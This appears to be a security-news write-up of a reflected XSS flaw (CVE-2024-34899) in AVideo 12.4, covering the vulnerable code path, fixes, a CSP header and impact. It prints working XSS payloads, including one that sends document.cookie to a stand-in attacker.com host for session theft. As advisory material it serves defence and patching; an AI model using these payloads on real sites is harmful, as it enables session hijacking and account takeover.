Listen to this Post
Technical Explanation of CVE-2024-34899
This reflected XSS vulnerability exists in AVideo’s `videoNotFound.php` file because unsanitized user input flows directly into JavaScript’s `innerHTML` sink. The attack begins when a victim clicks a crafted URL containing the `404ErrorMsg` parameter. The PHP script at `view/videoNotFound.php:49` uses `json_encode()` on this parameter, which only escapes quotes and backslashes—critically, it does not escape HTML angle brackets (< and >). The encoded string is then passed to the JavaScript function avideoAlertInfo(), which eventually calls avideoAlertHTMLText(). At view/js/script.js:1464, the function sets span.innerHTML = msg, where `msg` contains the unescaped HTML tags. When the browser renders this, it parses the HTML tags as real DOM elements. If an attacker injects <img src=x onerror=alert(1)>, the `onerror` handler executes arbitrary JavaScript in the victim’s browser context. This bypass occurs because `json_encode()` treats the output as JSON data, not HTML, while `innerHTML` interprets it as markup. The same vulnerable sink exists in four different alert functions within script.js, making this a systemic issue in AVideo’s JavaScript alert handling .
dailycve form
Platform: AVideo
Version: 12.4
Vulnerability: Reflected XSS
Severity: High
Date: May 15, 2024
Prediction: Patch already available
What Undercode Say
Analytics
The vulnerability was discovered by DanielnetoDotCom and published to the GitHub Advisory Database on May 19, 2024. The issue affects AVideo version 12.4 specifically . Multiple CVEs exist for AVideo XSS vulnerabilities across different versions (CVE-2023-48728 in 11.6, CVE-2024-34899 in 12.4, CVE-2025-53084 in 14.4), indicating recurring input sanitization problems . The root cause pattern is consistent: unsanitized user input flowing into JavaScript rendering functions .
Bash Commands and Codes
Test if AVideo instance is vulnerable curl -s "https://target.com/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.domain)>" | grep -i "alert(document.domain)"
// Vulnerable code (view/videoNotFound.php line 49)
if (!empty($_REQUEST['404ErrorMsg'])) {
echo 'avideoAlertInfo(' . json_encode($_REQUEST['404ErrorMsg']) . ');';
}
// Fixed code (with JSON_HEX_TAG)
if (!empty($_REQUEST['404ErrorMsg'])) {
echo 'avideoAlertInfo(' . json_encode($_REQUEST['404ErrorMsg'], JSON_HEX_TAG | JSON_HEX_AMP) . ');';
}
// Vulnerable JavaScript sink (view/js/script.js line 1464) span.innerHTML = msg; // Renders HTML tags, executes JavaScript // Fixed version (using textContent) span.textContent = msg; // Treats as plain text only
Enumerate all alert functions that use innerHTML grep -r "innerHTML" view/js/script.js | grep -E "avideoAlert|avideoConfirm"
Content-Security-Policy header (defense in depth) Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'
Exploit
https://victim-site.com/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.cookie)>
The payload flows through the chain: URL parameter → `json_encode()` (no HTML escaping) → `avideoAlertInfo()` → `avideoAlert()` → `avideoAlertHTMLText()` → span.innerHTML. The `onerror` event fires because `src=x` fails to load, executing `alert(document.cookie)` in the victim’s browser .
Advanced payload for session theft:
<
svg/onload=fetch('https://attacker.com/steal?cookie='+document.cookie)>
Protection from this CVE
Immediate remediation:
1. Apply the official patch from WWBN
- Replace all instances of `innerHTML` with `textContent` in alert functions
- Add `JSON_HEX_TAG | JSON_HEX_AMP` flags to all `json_encode()` calls handling user input
4. Implement Content-Security-Policy headers restricting script sources
Code-level fixes:
// Always escape HTML contexts properly echo json_encode($user_input, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS);
// Never use innerHTML with user-controlled data span.textContent = msg; // Safe alternative
Impact
- Session hijacking: Attacker can steal `PHPSESSID` cookies (not HttpOnly by default)
- Account takeover: Stolen sessions allow password changes and email modifications
- Phishing: Malicious login forms injected via SweetAlert modal
- Worm propagation: Self-spreading payloads via comments or messages
- Admin compromise: Crafted links sent to administrators lead to full system control
- Data exfiltration: Sensitive user information theft
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

